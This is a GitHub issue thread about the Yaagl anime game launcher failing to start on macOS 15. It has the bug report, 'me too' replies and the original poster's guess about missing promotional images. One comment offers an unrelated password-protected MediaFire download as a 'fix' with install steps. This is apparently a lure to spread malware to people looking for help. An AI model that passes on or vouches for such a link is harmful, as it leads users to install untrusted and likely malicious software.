### ISSUE TITLE
Cannot launch Yaagl

### ISSUE THREAD

**Issue by KexinyingLife** [yaagl/yet-another-anime-game-launcher#431]
**Describe the bug**
<img width="532" alt="截屏2024-08-27 16 28 57" src="https://github.com/user-attachments/assets/22fced3e-702e-4091-b4f1-5b750ccf88e3">

**System Information (please complete the following information):**
 - macOS: 15.0
 - Device: MacbookPro 16inch 2023
 - CPU: Apple M2 Pro
 - RAM: 16G

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by KexinyingLife** [comment]
> to fix your trouble try download this fix, i see it in another issue, https://app.mediafire.com/3ag3jpquii3of password: changeme when you installing, you need to place a check in install to path and select "gcc."

Sorry,I can't understand how to fix it.

**Comment by wujiki** [comment]
i have this problem also QAQ

**Comment by wujiki** [comment]
please @me when this bug is fixes

**Comment by wujiki** [comment]
please @me when this bug is fixed

**Comment by KexinyingLife** [comment]
> please @me when this bug is fixed

I think it's possibly because today is the last day of this version, and the official didn't send back the promotional images. The official launcher is using the default images. The yaagl version, which was just updated, can retrieve the official images, but it might not have a solution for this situation. Let's wait for the 5.0 update to see if it can be opened then.
